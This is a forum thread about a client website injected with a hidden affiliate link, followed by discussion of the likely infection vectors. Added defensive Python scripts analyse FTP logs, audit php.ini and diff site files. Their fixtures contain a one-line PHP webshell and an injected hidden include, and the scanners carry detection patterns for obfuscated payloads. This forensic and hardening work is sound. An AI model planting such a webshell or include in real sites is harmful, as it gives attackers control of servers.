
Hacked by Russians!

Discussion in 'Black Hat SEO' started by JenniFranks, Dec 13, 2010.

  1. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    While updating content on a client's website, I noticed an odd include in the footer. When I checked, I discovered someone had installed sape.ru's affiliate program as a tiny link in their footer and it was linking to child porn. I restored the site from backup and warned the client. Let it be a warning: maintain backups and be vigilant about security!
     
    • Thanks Thanks x 1
  2. Grizzy

    Grizzy Senior Member

    Joined:
    Nov 11, 2008
    Messages:
    919
    Likes Received:
    999
    Report that shit to the police as well!
     
    • Thanks Thanks x 1
  3. glovek77

    glovek77 Power Member

    Joined:
    Oct 28, 2008
    Messages:
    659
    Likes Received:
    808
    Occupation:
    Student
    Location:
    USA
    • Thanks Thanks x 8
  4. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    That's up to the client. I urged them to, but I doubt they will. For all I know, they could have installed the affiliate code themselves. Doubtful though.
     
  5. Grizzy

    Grizzy Senior Member

    Joined:
    Nov 11, 2008
    Messages:
    919
    Likes Received:
    999
    Screw the client, cover your own ass. Aside from the moral issue, in some places it is a criminal offense to fail to report such a thing. I used to work in IT, and I know of a network admin who got into very serious trouble because he handled a similar situation very poorly.
     
  6. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    Done, I reported the site in question.
     
    • Thanks Thanks x 4
  7. wrangler

    wrangler Regular Member

    Joined:
    Jun 14, 2010
    Messages:
    487
    Likes Received:
    599
    You do realise that when you restored from backup, you restored it to the state in which it was, obviously, hackable. You should ensure that you keep it offline until you figure the vector you were hacked, and fix it, m'kay.
     
    • Thanks Thanks x 2
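    One way to do what wrangler is asking for, finding the vector before putting the restored site back online, is to correlate the FTP server's transfer log against the files you found modified. This is an added example, not code from the thread: the xferlog lines, hosts, user name and paths below are constructed for illustration, and the allowlist of "known" developer hosts is an assumption you would replace with your team's real addresses.

```python
import re
from datetime import datetime, timedelta

# Constructed xferlog sample (the wu-ftpd/proftpd/vsftpd "xferlog" format). Fields:
# weekday month day time year seconds remote-host bytes path type special direction
# access-mode user service auth-method auth-user completion. Hosts, user and paths are
# made up for this example; direction 'o' is a download by the client, 'i' an upload.
SAMPLE_XFERLOG = """\
Sun Dec 12 09:14:02 2010 1 198.51.100.10 4821 /var/www/html/index.php b _ i r webuser ftp 0 * c
Sun Dec 12 09:14:03 2010 1 198.51.100.10 1377 /var/www/html/footer.php b _ i r webuser ftp 0 * c
Mon Dec 13 03:12:45 2010 1 203.0.113.45 1377 /var/www/html/footer.php b _ o r webuser ftp 0 * c
Mon Dec 13 03:12:49 2010 1 203.0.113.45 1612 /var/www/html/footer.php b _ i r webuser ftp 0 * c
Mon Dec 13 03:12:50 2010 1 203.0.113.45 1988 /var/www/html/wp-content/themes/x/footer.php b _ i r webuser ftp 0 * c
Mon Dec 13 10:30:11 2010 1 198.51.100.10 12 /var/www/html/robots.txt b _ i r webuser ftp 0 * c
"""

XFER_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) (?P<secs>\d+) (?P<host>\S+) "
    r"(?P<bytes>\d+) (?P<path>\S+) (?P<type>[ab]) (?P<special>\S+) (?P<direction>[iod]) "
    r"(?P<mode>[arg]) (?P<user>\S+) (?P<service>\S+) (?P<auth>\d) (?P<auth_user>\S+) "
    r"(?P<status>[ci])$"
)


def parse_xferlog(text):
    """Parse xferlog lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = XFER_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%a %b %d %H:%M:%S %Y")
        e["bytes"] = int(e["bytes"])
        entries.append(e)
    return entries


def hosts_by_user(entries):
    """Which remote hosts used each FTP account. A legitimate account logging in from a
    host the team has never used is the classic sign of a stolen saved password."""
    seen = {}
    for e in entries:
        seen.setdefault(e["user"], set()).add(e["host"])
    return seen


def suspicious_uploads(entries, known_hosts, modified_files, lookback=timedelta(minutes=10)):
    """Uploads of the tampered files from hosts outside the allowlist. For each one, note
    whether the same host downloaded the file shortly before (fetch, append, re-upload)
    and by how many bytes the file grew, which is the size of what was appended."""
    findings = []
    for e in entries:
        if e["direction"] != "i" or e["path"] not in modified_files or e["host"] in known_hosts:
            continue
        prior = [d for d in entries
                 if d["direction"] == "o" and d["host"] == e["host"] and d["path"] == e["path"]
                 and timedelta(0) <= e["ts"] - d["ts"] <= lookback]
        findings.append({
            "ts": e["ts"], "host": e["host"], "user": e["user"], "path": e["path"],
            "fetched_first": bool(prior),
            "grew_by": e["bytes"] - prior[-1]["bytes"] if prior else None,
        })
    return findings


if __name__ == "__main__":
    entries = parse_xferlog(SAMPLE_XFERLOG)
    tampered = {"/var/www/html/footer.php", "/var/www/html/wp-content/themes/x/footer.php"}
    for f in suspicious_uploads(entries, known_hosts={"198.51.100.10"}, modified_files=tampered):
        print(f)
    print(hosts_by_user(entries))
```

    The list of tampered paths comes from comparing the live tree against the backup (or from find -newer against a file you know is clean); the allowlist is the team's own addresses. If the transfer log shows the site's own account uploading from an unfamiliar host, the vector was a stolen credential and no amount of PHP hardening alone fixes it: rotate the password and stop storing it in the client.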
  8. Marketing Jhonny

    Marketing Jhonny Registered Member

    Joined:
    Dec 10, 2010
    Messages:
    87
    Likes Received:
    27
    Occupation:
    Im an SEO Specialist
    Location:
    506 | 1337 Marketing!
    Russians suck sometimes... and meh just block all outlinks from the site!
     
  9. Autumn

    Autumn Elite Member

    Joined:
    Nov 18, 2010
    Messages:
    2,197
    Likes Received:
    3,041
    Occupation:
    I figure out ways to make money online and then au
    Location:
    Spamville
    If they got root on your box you have to do a clean install, they could have left any number of backdoors on there.
     
    • Thanks Thanks x 1
  10. sfidirectory

    sfidirectory Senior Member

    Joined:
    Mar 29, 2010
    Messages:
    899
    Likes Received:
    483
    Occupation:
    Web developer/BTC enthusiast
    Location:
    php artisan make:migration
    When will these Russian hackers ever learn? I'm not hassling Russians in general, as some of them are pretty good at legal things online (I think there is a Russian BHW Admin/Moderator on here, not sure though), just some of them tend to ruin Russia's reputation. It's the same with China, I hear of all these hackers sending worms and backdoors etc and infecting websites and computers. The Chinese are very clever and innovative, and they actually do a lot of good (apart from human rights issues), just a group of Chinese people go the extra mile to give their nation a bad name.

    As for the child porn, you must report it, seriously! I have a very young boy and if someone ever sent me that shit I will track them down and make sure they get what they deserve, no matter how long it takes. If you or your client has children, you would have no hesitation in reporting this crap (if you haven't done so already).
     
  11. madoctopus

    madoctopus Supreme Member

    Joined:
    Apr 4, 2010
    Messages:
    1,249
    Likes Received:
    3,498
    Occupation:
    Full time IM
    Are you using FileZilla FTP client? I had the same problem and it was because I had the password saved by FileZilla and there is an exploit/virus that exploits FileZilla and uploads a JavaScript injection in all your site's files (in footer). In my case it was trying to download an .exe on the client's/visitor's computer. It may not be just FileZilla that is exploitable but other FTP clients too.

    Also, the host might be exploitable for PHP file upload and execution (allow execution of PHP files in temp directory). It could also be an XSS (cross site scripting) exploit.
     
    • Thanks Thanks x 5
  12. sfidirectory

    sfidirectory Senior Member

    Joined:
    Mar 29, 2010
    Messages:
    899
    Likes Received:
    483
    Occupation:
    Web developer/BTC enthusiast
    Location:
    php artisan make:migration
    I use FileZilla and I have had a couple of my sites infected. Been trying to find out how it happened for ages but you've explained it pretty well, hence the thanks given :). Is there any way to get rid of the particular virus that causes the problems? I have McAfee full version (paid for by the way :)), just not sure how deep in the system this virus resides. I also noticed that the injected code was at the top of my site's PHP files. My PHP knowledge is still growing, but I'm guessing because it is server side script it's how the virus can do all this, as opposed to HTML.
     
  13. Kid Shaleen

    Kid Shaleen Regular Member

    Joined:
    Oct 29, 2009
    Messages:
    250
    Likes Received:
    63
    I also recommend that you report the matter to the authorities. The whole kiddie porn issue is a major one internationally that you don't want to run afoul of, for any reason whatsoever.

    Also, as I recall from having checked a couple of Russian providers a while ago, their TOS's tended to list four violations: 1) kiddie porn; 2) illegal drugs; 3) illegal weapons; 4) Nazis (whatever their politics today, they're Russians after all, and they've long memories.)

    So I think you should also inform the service providers about what's being done on/with their systems.
     
  14. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    All of our dev machines are Macs, so we're using Transmit and the command-line interface.
    It's very likely a PHP exploit. I've since hardened the configuration. If anyone is curious and wants to try some penetration testing, PM me.
     
  15. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    It's been reported to three authorities: One government and two non profits.
     
  16. houseaz

    houseaz Regular Member

    Joined:
    Mar 25, 2010
    Messages:
    296
    Likes Received:
    73
    Occupation:
    Making money
    Location:
    Wherever I can Make Money
    Sounds like an offer to me...lol...j/k. Actually the Filezilla thing was pretty serious BUT if you upgrade when it tells you to you ain't got nothing to worry about!
     
  17. smolodoys

    smolodoys Regular Member

    Joined:
    Feb 17, 2010
    Messages:
    339
    Likes Received:
    4
    Why do search engines even rank that shit... especially the child porn; it should be off the net, period.
     
  18. LyNHS

    LyNHS Regular Member

    Joined:
    Jul 20, 2010
    Messages:
    282
    Likes Received:
    98
    Occupation:
    Google AdSense
    Assuming the "include" as in using PHP's include function ... why didn't you configure your client's server to not include any file that isn't on the same server, or have I got the wrong end of the stick?

    If the link was actually embedded in the footer, then damn! Definitely report that shit to the Police!
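    The two server-side weaknesses raised in this thread, madoctopus's "PHP file upload and execution" and LyNHS's "don't include any file that isn't on the same server", both map to php.ini directives. Below is an added example (not from the thread, not anyone's production config) of a small audit script that flags the weak settings: the "weak" fragment is a constructed stand-in for a lax shared-host default and the "hardened" fragment is the corrected counterpart; the paths, the assumption that the site needs no remote fopen and no shell-out, and the built-in PHP defaults encoded in BUILTIN_DEFAULTS are all assumptions stated in the comments.

```python
import posixpath

# Constructed php.ini fragment standing in for a lax shared-host default (assumption).
WEAK_INI = """\
engine = On
allow_url_fopen = On
allow_url_include = On
display_errors = On
expose_php = On
file_uploads = On
upload_tmp_dir = /var/www/html/tmp
disable_functions =
open_basedir =
"""

# Constructed hardened counterpart. Assumes the site needs neither remote fopen nor
# shell-out, and that its document root is /var/www/html.
HARDENED_INI = """\
engine = On
allow_url_fopen = Off
allow_url_include = Off
display_errors = Off
log_errors = On
expose_php = Off
file_uploads = On
upload_tmp_dir = /var/lib/php/upload_tmp
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
open_basedir = /var/www/html:/var/lib/php/upload_tmp
"""

# PHP's built-in value when the directive is absent from php.ini (php.ini-production
# overrides some of these, so an absent directive is NOT automatically safe).
BUILTIN_DEFAULTS = {
    "allow_url_fopen": "1",
    "allow_url_include": "0",
    "display_errors": "1",
    "expose_php": "1",
}
SHELL_FUNCS = ("exec", "passthru", "shell_exec", "system", "proc_open", "popen")


def parse_ini(text):
    """Minimal php.ini reader: key = value, ';' comment lines and [sections] skipped,
    surrounding quotes stripped. Inline comments after a value are not handled."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";[":
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    return value.strip().lower() in ("1", "on", "true", "yes")


def audit_php_ini(text, docroot):
    """Return (directive, problem) pairs for every weak setting found; [] if clean."""
    s = parse_ini(text)
    get = lambda k: s.get(k, BUILTIN_DEFAULTS.get(k, ""))
    findings = []
    if is_on(get("allow_url_include")):
        findings.append(("allow_url_include", "include/require accept URLs: remote file inclusion"))
    if is_on(get("allow_url_fopen")):
        findings.append(("allow_url_fopen", "file functions fetch URLs; turn off unless the site needs it"))
    if is_on(get("display_errors")):
        findings.append(("display_errors", "errors with paths and queries are shown to visitors"))
    if is_on(get("expose_php")):
        findings.append(("expose_php", "PHP version advertised in the X-Powered-By header"))
    disabled = {f.strip() for f in get("disable_functions").split(",") if f.strip()}
    missing = [f for f in SHELL_FUNCS if f not in disabled]
    if missing:
        findings.append(("disable_functions", "shell-out still allowed: " + ", ".join(missing)))
    if not get("open_basedir"):
        findings.append(("open_basedir", "scripts may read any file the web user can"))
    tmp = get("upload_tmp_dir")
    if tmp and posixpath.normpath(tmp).startswith(posixpath.normpath(docroot) + "/"):
        findings.append(("upload_tmp_dir", "uploads land inside the document root, where they can be requested and executed"))
    return findings


if __name__ == "__main__":
    for directive, problem in audit_php_ini(WEAK_INI, "/var/www/html"):
        print(f"{directive}: {problem}")
    print("hardened:", audit_php_ini(HARDENED_INI, "/var/www/html") or "clean")
```

    Run it against the php.ini the host actually loads (php -i | grep "Loaded Configuration File"), not a copy; on shared hosting many of these can only be set by the provider, and ini_set() at runtime cannot override php_admin_* values. The upload-directory half of madoctopus's point is enforced at the web server rather than in php.ini: deny script execution in any directory that accepts uploads (with mod_php, php_admin_flag engine off in that directory's block), so an uploaded .php file is served as text rather than run.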
     
  19. ivictus

    ivictus Regular Member

    Joined:
    Jan 26, 2010
    Messages:
    223
    Likes Received:
    31
    I got hit by a JavaScript webpage virus. I had passwords stored for FTP in Dreamweaver and WSFTP. I could see the page had some JavaScript thing load and then I shut down my computer right away, but it was too late.
     
  20. madoctopus

    madoctopus Supreme Member

    Joined:
    Apr 4, 2010
    Messages:
    1,249
    Likes Received:
    3,498
    Occupation:
    Full time IM
    I used Malwarebytes Anti-Malware as my antivirus didn't detect that program. Malwarebytes did a good job identifying and cleaning it. Then, I wrote a custom PHP script to find the injected code and delete it.
     
    • Thanks Thanks x 1
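    JenniFranks found the injected include by noticing it in the footer, and madoctopus wrote a custom PHP script to find and delete the injected code. Below is an added example (my code, not JenniFranks's or madoctopus's script, and written in Python rather than PHP so it can run from a dev machine against a copy of the site) that does both halves of that job: it diffs the live tree against the known-good backup to list every added and changed file and the exact lines that appeared, then runs a small set of generic signatures (encoded eval, obfuscated script, 1-pixel iframe, hidden link, remote include) over files that have no baseline. The sample backup and live trees, the injected include path and the affiliate domain are all constructed for the example.

```python
import hashlib
import os
import re
import shutil
import tempfile

# Generic signatures for the injections this thread describes (footer links, prepended
# JavaScript, encoded PHP). Tune to what you actually find; the diff below needs none.
SIGNATURES = [
    ("eval of decoded payload", re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
    ("obfuscated script", re.compile(r"<script[^>]*>[^<]*(?:unescape|fromCharCode)\s*\(", re.I)),
    ("tiny iframe", re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?[01]\b", re.I)),
    ("hidden link", re.compile(r"<(?:a|div)\b[^>]*style\s*=\s*[\"'][^\"']*display\s*:\s*none", re.I)),
    ("remote include", re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*[\"']https?://", re.I)),
]


def hash_tree(root):
    """relative path -> sha256 of every regular file under root."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                out[os.path.relpath(full, root).replace(os.sep, "/")] = hashlib.sha256(fh.read()).hexdigest()
    return out


def changed_files(backup_root, live_root):
    """Added, removed and modified files between the known-good backup and the live site."""
    b, l = hash_tree(backup_root), hash_tree(live_root)
    return {
        "added": sorted(set(l) - set(b)),
        "removed": sorted(set(b) - set(l)),
        "modified": sorted(p for p in set(b) & set(l) if b[p] != l[p]),
    }


def injected_lines(backup_file, live_file):
    """Lines present in the live copy but absent from the backup, in file order."""
    with open(backup_file, encoding="utf-8", errors="replace") as fh:
        baseline = set(fh.read().splitlines())
    with open(live_file, encoding="utf-8", errors="replace") as fh:
        return [ln for ln in fh.read().splitlines() if ln not in baseline]


def scan_for_signatures(text):
    """(line number, signature name) for every line matching a signature."""
    return [(n, name) for n, line in enumerate(text.splitlines(), 1)
            for name, rx in SIGNATURES if rx.search(line)]


def scan_file(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_for_signatures(fh.read())


def strip_matching_lines(path):
    """Remove signature-matching lines, keeping the original beside it as evidence.
    Returns (lines removed, quarantine path or None). Whole-line removal only: a payload
    sharing a line with legitimate code needs a manual edit."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        lines = fh.read().splitlines(keepends=True)
    keep = [ln for ln in lines if not any(rx.search(ln) for _, rx in SIGNATURES)]
    if len(keep) == len(lines):
        return 0, None
    quarantine = path + ".quarantine"
    shutil.copy2(path, quarantine)
    with open(path, "w", encoding="utf-8") as fh:
        fh.writelines(keep)
    return len(lines) - len(keep), quarantine


def build_sample():
    """Constructed backup and live trees for this example; the injected include path,
    the affiliate domain and the dropped webshell are made up."""
    root = tempfile.mkdtemp(prefix="webroot-diff-")
    clean_footer = "</div>\n<footer>&copy; 2010 Client</footer>\n</body>\n</html>\n"
    injected_footer = (
        "</div>\n<footer>&copy; 2010 Client</footer>\n"
        "<?php include($_SERVER['DOCUMENT_ROOT'].'/wp-content/uploads/.cache/links.php'); ?>\n"
        "<div style=\"display:none\"><a href=\"http://affiliate.example/\">cheap stuff</a></div>\n"
        "</body>\n</html>\n"
    )
    files = {
        "backup/index.php": "<?php echo 'hello'; ?>\n",
        "backup/footer.php": clean_footer,
        "live/index.php": "<?php echo 'hello'; ?>\n",
        "live/footer.php": injected_footer,
        "live/images/x.php": "<?php eval(base64_decode($_POST['c'])); ?>\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return {
        "backup": os.path.join(root, "backup"), "live": os.path.join(root, "live"),
        "backup_footer": os.path.join(root, "backup", "footer.php"),
        "live_footer": os.path.join(root, "live", "footer.php"),
        "webshell": os.path.join(root, "live", "images", "x.php"),
    }


if __name__ == "__main__":
    p = build_sample()
    print(changed_files(p["backup"], p["live"]))
    print(injected_lines(p["backup_footer"], p["live_footer"]))
    print(scan_file(p["webshell"]))
```

    The diff is the part to trust: it finds the sape-style include whatever it looks like, and it surfaces the files the attacker added (the dropped x.php here) that a blind restore from backup would leave untouched only if the restore also deletes extras. Run it on a copy taken before you restore, keep the .quarantine files as evidence for the report, and treat anything in "added" as the first place to look for a backdoor, which is Autumn's point about re-installing if the box itself was rooted.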